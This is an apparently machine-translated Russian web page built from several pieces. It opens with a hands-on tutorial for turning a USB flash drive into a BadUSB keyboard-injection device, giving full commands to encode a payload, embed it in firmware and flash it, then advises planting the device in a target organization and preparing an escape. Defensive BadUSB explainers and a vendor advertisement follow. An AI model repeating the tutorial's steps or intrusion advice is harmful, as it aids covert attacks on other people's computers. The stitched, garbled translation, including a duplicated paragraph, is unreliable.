«Duck Encoder» — это кроссплатформенный инструмент на основе Java, который преобразует сценарии в полезные данные HID.Он основан на Bad-USB под названием «Rubber Ducky» от Hak5. Вы можете скачать здесь . (Не забудьте установить Java.) Я сохранил его в папке E: \ Documents \ Bad_USB \ DuckEncoder \ .

Создание кастомной прошивки

На данный момент все наши приготовления завершены, и мы можем продолжать использовать инструменты. На этом этапе нам просто нужно перейти в наш каталог … \ Psychson \ firmware \ и запустить build.bat . Если все пойдет правильно, вы увидите новую папку с множеством разных файлов внутри.

Файл fw.bin — это файл, который мы будем использовать в следующих полезных данных.

Написание сценария

Вы можете спросить себя, на каком языке мы будем писать наш сценарий. Поскольку Duck Encoder основан на «Rubber Ducky», мы будем использовать «Duckyscript» в качестве языка. Синтаксис довольно простой. Более подробные инструкции можно найти здесь.

Мы продолжим и создадим файл .txt в нашем предпочтительном каталоге

( E: \ Documents \ Bad_USB \ DuckEncoder \ script.txt ). Я подумал показать вам что-то более интересное, чем сценарий «Hello World», поэтому сделал этот:

Как вы можете предположить, Bad USB «нажмет» Windows + R и вызовет немедленное закрытие окон с помощью этого сценария. Кроме того, вы можете ясно видеть, что я написал «/» вместо «-». Это потому, что наша «клавиатура» (Bad USB) имеет раскладку для США, а в моей стране Windows установлена ​​на DEU. Имейте в виду, что мы должны изменить макет Windows на США и написать сценарий, как обычно, или так, как его напишет компьютер вашей жертвы.Не путайте ввод.

Здесь вы даже можете использовать собственные скрипты и провести обратный инжиниринг.

Преобразование в скрытую полезную нагрузку

Пора начать пользоваться терминалом Windows — cmd.

java -jar «ПУТЬ к \ duckencode.jar» -i «ПУТЬ к \ script.txt» -o «\ payload.bin Path»

Пример:

java -jar E: \ Documents \ BadUSB \ DuckEncoder \ duckencode.jar -i E: \ Documents \ Bad_USB \ DuckEncoder \ script.txt -o E: \ Documents \ Bad_USB \ DuckEncoder \ inject.корзина

Мы не получим никакого вывода, но в моем случае inject.bin должен быть создан в E: \ Documents \ Bad_USB \ DuckEncoder \ .

Вставить полезную нагрузку в прошивку

Теперь нам нужно использовать инструменты, которые мы создали с помощью Visual Studio. Очевидно, что EmbedPayload предназначен для встраивания полезной нагрузки. Нам просто нужно выполнить его в cmd:

«Путь к EmbedPayload.exe» «ПУТЬ к полезной нагрузке» «ПУТЬ к встроенной нами прошивке»

Для меня это:

E: \ Documents \ BadUSB \ Psychson \ tools \ EmbedPayload.exe E: \ Documents \ Bad_USB \ DuckEncoder \ inject.bin E: \ Documents \ Bad_USB \ Psychson \ firmware \ bin \ fw.bin

Обратите внимание, что теперь файл fw.bin включает полезную нагрузку. Вы также можете перезаписать прошивку, повторно запустив build.bat.

Дамп текущей прошивки USB-накопителя

Настоятельно советую сделать копию текущей прошивки на флешку на случай, если вы захотите ее восстановить. Для любого действия, которое мы хотим предпринять с нашим USB-накопителем, мы должны использовать DriveCom, который находится в нашей папке «tools».

«ПУТЬ к DriveCom.exe» / drive = «Буква диска нашего USB» / action = DumpFirmware / burner = «ПУТЬ к образу записывающего устройства» / firmware = «ПУТЬ к output.bin»

В моем экземпляре:

E: \ Documents \ Bad_USB \ Psychson-master \ tools \ DriveCom.exe / drive = F / action = DumpFirmware /burner=E:\Documents\Bad_USB\Firmware\BN03V117M.BIN / firmware = E: \ Documents \ Bad_USB \ originalfw.bin

Прошивка Прошивка

Наконец, мы можем передать очень злонамеренную полезную нагрузку завершения работы, встроенную в прошивку, на наш USB-накопитель:

«ПУТЬ к DriveCom.exe »/ drive =« Буква диска »/ action = SendFirmware / burner =« ПУТЬ к образу записывающего устройства »/ firmware =« ПУТЬ к прошивке »

В моем экземпляре:

E: \ Documents \ BadUSB \ Psychson \ tools \ DriveCom.exe / drive = F / action = SendFirmware /burner=E:\Documents\Bad_USB\Firmware\BN03V117M.BIN / firmware = E: \ Documents \ Bad_USB \ Psychson \ прошивка \ bin \ fw.bin

Успешный вывод должен выглядеть так:

Обратите внимание, что DriveCom автоматически переключает режим нашего USB-накопителя в режим загрузки для прошивки прошивки.Теперь, когда наш USB-накопитель превратился в клавиатуру, мы больше не можем переключать режимы с помощью наших инструментов или доступа к памяти, но это небольшая проблема. В следующем разделе я сосредоточусь на том, как решить эту проблему.

Установка нашего устройства в «режим загрузки» вручную

Если вы захотите предпринять дальнейшие действия с неисправным USB-накопителем, вы заметите, что ни DriveCom, ни Windows, ни какая-либо другая операционная система не могут получить к нему доступ, потому что это, в конце концов, клавиатура. Нам нужно открыть корпус нашего USB-накопителя и подключить два контакта микроконтроллера, подключив накопитель к нашему ПК.Поскольку круг находится в верхнем левом углу моего контроллера (с этой точки зрения), мне нужно соединить два контакта на левой нижней стороне:

Возможно, вам потребуется открыть изображение в новой вкладке и увеличить.

Обычно я использую край USB-разъема для соединения этих двух контактов. Кроме того, в этом случае может быть очень полезен удлинительный кабель USB. Вроде сложно, но к этому привыкнешь. Используйте то, что вам удобнее, не повредив USB-накопитель. Если вы все сделаете правильно, диск снова появится в Windows:

Я по большей части использую край USB-разъема для связи этих двух контактов.Кроме того, в этой ситуации может оказаться исключительно полезным дополнительный USB-канал. По общему мнению, это хлопотно, но вы к этому привыкнете. Используйте все, что вам больше всего нравится, не повредив USB-накопитель. В том случае, если вы сделаете это аккуратно, диск снова появится в Windows:

Более того, мы можем поменять наш привод или еще раз прошить первую прошивку. В противном случае ваш компьютер выключится — в следующий раз вложите больше энергии.

Сделайте свою собственную USB Rubber Ducky: Notes

Плохой USB-порт может не работать с каждым ПК с Windows, включая мой, так как он может быть неуместным при установке драйверов.

Помните, что у вас не будет возможности получить доступ к памяти, пока ваш USB-накопитель имитирует HID-гаджет.

Последние мысли

Плохой USB-порт — это подходящий инструмент в случае, если у вас есть доступ к компьютеру пострадавшего, несмотря на то, что Windows может не справиться с установкой драйверов USB. Более того, он сохраняет стратегическое расстояние от местоположения AV, поскольку это консоль, а не инфекция.

Если вы думаете о том, чтобы сделать простой внешний вид, чтобы встроить наш USB-накопитель в один компьютер в выбранной вами организации, обратите внимание на то, чтобы иметь настоящий USB-накопитель на случай, который вы, несомненно, получите, чтобы вы могли эффективно сбежать.

Кроме того, я хотел бы указать, что я искренне признателен за полезную критику от всех вас. Так что не стесняйтесь писать мне в личку, если вы обнаружите какую-либо ошибку или вам понадобится что-то улучшить!

С уважением, MY_OUZO

Как это работает и методы профилактики

В этой статье мы сосредоточимся на новом семействе вредоносных программ: атаках BadUSB.

Атака BadUSB — это недавнее открытие (хотя сам по себе принцип не нов) и позволяет превратить любое USB-устройство в кибероружие, способное немедленно внедрить вредоносный код в компьютер без возможности его обнаружения.

BadUSB использует тот факт, что к разъемам USB подключается множество различных устройств. Изменяя поведение микроконтроллера USB «обычного» устройства, например, USB-накопителя, BadUSB может изменить его на что-то совершенно другое, например клавиатуру или сетевую карту.

Достаточно подключить модифицированное (BadUSB) устройство к компьютеру, и несанкционированное устройство может выполнять команды или внедрять вредоносное программное обеспечение без предварительного подтверждения или согласия владельца.

При некоторых атаках программное обеспечение BadUSB преобразует микропрограмму USB-устройства так, чтобы оно отображалось в операционной системе как клавиатура. Например, «Сделай сам» Rubber Ducky USB — это коммерческий пакет для взлома (45 $), который после вставки вводит в компьютер около 1000 слов в минуту.

Атаки

BadUSB опасны, поскольку большинство антивирусных и вредоносных сканеров обычно не имеют доступа к прошивке на USB-устройствах и не могут защитить компьютер.

Любой компьютер, к которому можно подключиться через порт USB, потенциально уязвим.Это особенно верно для промышленных систем, где злонамеренный код может быть введен в критически важные устройства, просто подключив к ним на несколько секунд USB-устройство.

Как работает атака BadUSB

Вот список атак, которые могут выполнять вредоносные устройства badUSB:

  • badUSB может выдавать себя за устройства интерфейса пользователя (HID), такие как клавиатуры или мыши;
  • Они могут отслеживать данные, отправляемые с главного компьютера на подчиненное USB-устройство с заданного USB-концентратора.Например, они могут перехватывать данные, записанные на USB-диск или отправить их на принтер, и т. Д.
  • Возьмите под контроль систему, используя низкоуровневую отладку в определенных типах BIOS;
  • Они могут использовать драйверы класса USB или файловые системы с вредоносным вводом. Например, файлы, скопированные с легального USB-накопителя на компьютер, могут быть изменены или заражены вредоносным кодом.

USB — это протокол последовательной связи («Универсальная последовательная шина»). Любое устройство, имеющее штекерный USB-разъем, можно подключить к одному из USB-портов «современного» компьютера.То, как компьютеры реагируют на подключенное к ним USB-устройство, определяется протоколом USB. Компьютер реализует свою сторону протокола (обычно внутри материнской платы в качестве контроллера USB), в то время как устройство USB реализует на своей стороне протокол USB, а также внутри прошивки. Ничто не мешает сделать несколько вариантов контроллеров USB, которые могут копировать данные, например, перенесенные в какое-то альтернативное хранилище резервных копий. Фактически, это известно как устройство анализатора шпионского протокола USB, специализированное оборудование, которое можно использовать для отладки реализации USB.Тем не менее, можно встроить псевдоклавиатуру USB в небольшую электронную плату и поместить ее во что-то похожее на корпус USB-накопителя. Псевдоклавиатура идентифицирует себя как устройство HID с клавиатурой, и операционная система сразу же ей будет доверять.

Возможные неисправные USB-устройства

Можно вставить практически все, что можно уменьшить в форм-факторе USB-накопителя. Например:

  • Клавиатура;
  • Сетевая карта;
  • Мышь;
  • Разъем Bluetooth.

Одно из самых ярких устройств badUSB — это USB-кабели для зарядки (или USB-адаптеры), которые используются во всем мире, например, для зарядки смартфонов.

Некоторым экспертам по безопасности удалось создать «стандартную» версию USB-кабеля для зарядки (кодовое название «USB-гарпун») со «badUSB», которая может практически мгновенно взломать компьютер. После того, как вставлен поддельный зарядный кабель, он активируется как устройство, способное отправлять команды на главный компьютер. Некоторые атаки даже включают физическое разрушение компьютера путем перегрузки заряда!

Возможные меры защиты от атаки BadUSB

Авторизация с клавиатуры

Из-за характера атаки существует не так много возможных предотвращений.Некоторые антивирусные компании разработали компоненты предотвращения атак BadUSB. Они не позволяют устройствам BadUSB имитировать клавиатуру с помощью следующего трюка:

Когда USB-устройство подключается к компьютеру и определяется операционной системой как клавиатура, антивирус требует от пользователя ввода числового кода запроса, который генерируется антивирусом с «новой» USB-клавиатуры. Такая процедура называется авторизацией с клавиатуры. Таким образом, антивирус разрешит использование только авторизованной клавиатуры и заблокирует любую другую клавиатуру, которая не была авторизована.

По-прежнему резидентное программное обеспечение безопасности — если они не могут заблокировать устройство badUSB, они также могут обнаружить саму вредоносную программу, запущенную с BadUSB.

Модификация USB Norm

Одним из возможных средств защиты от атак badUSB может быть изменение стандарта USB, чтобы отпечатки пальцев или рукопожатия с уверенностью определяли устройства.

Производители

USB, безусловно, серьезно занимаются этим вопросом. Между тем, это вряд ли произойдет в ближайшее время, поскольку нормы USB включают в себя множество крупных корпораций, которые все должны согласиться, прежде чем вносятся изменения.

Белый список USB-устройств

Можно разрешить установку только определенных драйверов по их GUID. Также можно ограничить авторизацию для установки USB-устройств, таких как клавиатуры и т. Д.

USB-брандмауэры

Некоторые компании продают аппаратные межсетевые экраны USB, стоящие между компьютером и другими устройствами USB. Брандмауэр фильтрует команды, отправляемые на гостевое USB-устройство.

Бдительность пользователя

Наконец, пользователь должен выполнить следующий контрольный список.

  • Может ли кто-нибудь, кроме пользователя, получить доступ к USB-портам компьютера пользователя?
  • Доверяет ли пользователь данному USB-устройству и может ли он утверждать, что компании, разработавшей его прошивку USB, можно доверять?
  • Есть ли сертификация прошивки USB устройства? Есть ли гарантия, что прошивка USB-устройства не была изменена во время или после изготовления?

Если ответ на все проверки отрицательный, то USB-устройству не следует доверять, по крайней мере, в контексте чувствительной среды, которая может быть целью шпионов или других злонамеренных действий.

Acodez — известная компания в области веб-дизайна и веб-разработки в Индии. Мы предлагаем нашим клиентам все виды услуг веб-дизайна и веб-разработки с использованием новейших технологий. Мы также являемся ведущей компанией цифрового маркетинга, предоставляющей услуги SEO, SMM, SEM, входящего маркетинга и т. Д. По доступным ценам. Для получения дополнительной информации, пожалуйста, свяжитесь с нами.

Ищем хорошую команду


для вашего следующего проекта?

Свяжитесь с нами, и мы дадим вам предварительную бесплатную консультацию
по веб-стратегии и мобильной стратегии, которая наилучшим образом соответствует вашим потребностям.

BadUSB: что это такое и как этого избежать

Что такое атака BadUSB?

BadUSB — это атака, использующая уязвимость встроенного ПО USB. Такая атака перепрограммирует USB-устройство, заставляя его действовать как устройство интерфейса пользователя; после модернизации USB-устройство используется для незаметного выполнения команд или запуска вредоносных программ на компьютере жертвы.

История BadUSB

Эксплойт BadUSB был впервые обнаружен и раскрыт исследователями безопасности Карстеном Нолом и Якобом Леллом на конференции Black Hat 2014 года.Код BadUSB в настоящее время доступен для общественности через сайт совместного использования кода, Github, а это означает, что любой, даже не обладающий достаточным опытом, может запустить полномасштабную атаку BadUSB.

Эти проблемы нельзя исправить. Мы используем тот же принцип, что и USB, — Карстен Ноль.

Как работает BadUSB

USB может подключаться ко многим различным устройствам, включая камеры, клавиатуры, модемы, веб-камеры, беспроводные сетевые устройства и другие.К сожалению, конструкция USB привела к недостатку безопасности BadUSB.

Микросхема микроконтроллера USB, содержащая микропрограммное обеспечение, используется для определения типа подключенного устройства и его возможностей. После того, как микропрограмма будет взломана, это лишь вопрос времени, когда хакер перепроектирует USB-устройство и вставит вредоносный код в рабочую станцию. Это подвергает организацию целому ряду атак на безопасность, таких как логические бомбы, кража данных, программы-вымогатели и многое другое.

Как защитить свой бизнес от атак BadUSB

Самым надежным решением для защиты от атак BadUSB было бы физическое блокирование всех USB-портов в организации. Однако такие устаревшие методы в конечном итоге снижают продуктивность сотрудников и препятствуют внедрению новых тенденций, таких как использование собственного устройства. Каждая организация нуждается в надежном решении для управления устройствами, которое может обнаруживать, предупреждать и останавливать гнусные действия, исходящие от USB-устройств, без ущерба для производительности.

Решение DataSecurity Plus

Нет лучшего способа обеспечить безопасное использование USB в вашей организации, чем использование DataSecurity Plus, комплексного решения для управления USB-устройствами.

Предотвращение кражи данных через USB

Блокировать файлы с конфиденциальными данными (такими как PII или ePHI) от копирования или перемещения на внешние устройства хранения.Сообщайте о каждом доступе к файлу и ускоряйте криминалистический анализ после инцидента.

Защита от атак безопасности BadUSB

Обнаружение потенциальных вторжений вредоносных программ, таких как заражение программами-вымогателями, которые проникают в организацию через атаки BadUSB, и мгновенная отправка предупреждений по электронной почте.

Поместить в карантин заражение программами-вымогателями BadUSB

Изолируйте и отключите поврежденную рабочую станцию ​​от сети в течение нескольких секунд после заражения программами-вымогателями с помощью механизма автоматического реагирования на угрозы DataSecurity Plus.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *